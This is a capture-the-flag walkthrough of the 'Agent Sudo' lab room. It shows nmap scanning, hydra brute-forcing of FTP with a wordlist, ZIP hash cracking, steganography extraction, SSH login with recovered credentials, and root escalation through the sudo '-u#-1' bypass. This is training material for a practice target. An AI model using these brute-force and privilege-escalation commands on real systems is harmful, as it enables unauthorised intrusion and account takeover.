Description: You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.
Let’s start with some enumeration by running a nmap scan:
┌──(root㉿kali)-[~/THM/Agent Sudo] └─# nmap -sV -Pn -T4 -A 10.10.205.169 Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-09 19:36 EDT Nmap scan report for 10.10.205.169 Host is up (0.11s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA) | 256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA) |_ 256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-title: Annoucement |_http-server-header: Apache/2.4.29 (Ubuntu) <snip> .......
Looks like there are three ports open
- 21 (FTP)
- 22 (SSH)
- 80 (HTTP)
Navigating to the URL in the browser shows us the following message:
Inspecting the page source doesn’t lead to anything but the message on the page from Agent R mentions changing their own codename as
user-agent to access the site.
Using Burp, let’s change the User-Agent to C instead of the browser.
This seems to go to a redirected link which is /agent_C_attention.php:
Going to http://10.10.205.169/agent_C_attention.php reveals the following message:
It looks like the agent’s name is chris, so let’s use hydra to try and enumerate each service to try and brute force a password:
┌──(root㉿kali)-[~/THM/Agent Sudo] └─# hydra -l chris -P /usr/share/wordlists/rockyou.txt -vV 10.10.205.169 ftp
And it looks like we got a password for the FTP account:
Let’s try and use those credentials to FTP into the server:
Looking around, I see the following files:
We need to download the files by running the mget command which will download the files to the kali vm.
Now that the files are on the kali vm, let’s take a look at them. Looking at the To_agentJ.txt file reveals that Agent J’s password is stored in the fake picture.
We need to figure out a way to extract data from the image files. I ended up coming across a tool called binwalk that allows you to extract any files from an image. You will need to add the –run-as=root flag for binwalk to run properly:
──(root㉿kali)-[~/THM/Agent Sudo] └─# binwalk --run-as=root -e cutie.png
You should now see a _cutie.png.extracted directory with a ZIP file and text file:
Taking an initial look at the To_agentR.txt file it seems to be empty, so let’s keep going.
The ZIP file is password protected so we need to use zip2john first which will extract the password hash from the ZIP file and output it into the .hash file. I just chose that extension, but you can name the output file anything you want.
┌──(root㉿kali)-[~/THM/Agent Sudo/_cutie.png.extracted] └─# zip2john 8702.zip > zipfile.hash
Now let’s trying cracking the hash:
┌──(root㉿kali)-[~/THM/Agent Sudo/_cutie.png.extracted] └─# john 8702.zip zipfile.hash
And we now have cracked the zip file password:
I tried to use
unzip -P to extract the file but this did not work. I’m going to try and use 7zip with the e flag to extract the file instead. This is installed by default on Kali 2022.2.
──(root㉿kali)-[~/THM/Agent Sudo/_cutie.png.extracted] └─# 7z e 8702.zip
Now, if we look at the To_agentR.txt file, Agent C is saying we need to send the picture to ‘QXJlYTUx’ which looks to be a base64 string:
Let’s try and decode the string:
──(root㉿kali)-[~/THM/Agent Sudo/_cutie.png.extracted] └─# echo "QXJlYTUx" | base64 -d; echo ""
This comes back with a password:
So, now that we have this password, we need to figure out where to use it. If we remember from earlier, Agent R stored the real picture inside of Agent J’s directory. Let’s use the steghide tool to try and extract any hidden data. Make sure steghide is installed first.
apt install steghide ┌──(root㉿kali)-[~/THM/Agent Sudo] └─# steghide extract -sf cute-alien.jpg
The message.txt file reveals the name of another agent and a password. Let’s try the credentials for the SSH login
This worked and now I’m logged in so let’s look for the user flag
Download the jpg file to your kali vm using scp.
Open up the image to see that it’s an image of an alien. Doing a Google search for this image comes back with an article on a faked alien autopsy by a filmmaker.
It looks like everyone can run /bin/bash except for root
Doing a Google search on this reveals that there’s a security bypass vulnerability in sudo version < 1.8.28 which can be seen here https://www.exploit-db.com/exploits/47502
You can check the version of sudo by doing the following
We see that the version is 1.8.21p2 which means we can exploit sudo on this machine. So let’s try the exploit:
[email protected]:~$ sudo -u#-1 /bin/bash
This worked! Let’s verify that we are root:
And now we can look for the root flag:
[email protected]:~# find / -type f -name root.txt 2>/dev/null
And that completes the walkthrough for Agent Sudo. I hope you’ve found this walkthrough helpful and enjoyed discovering new tips and tricks along the way!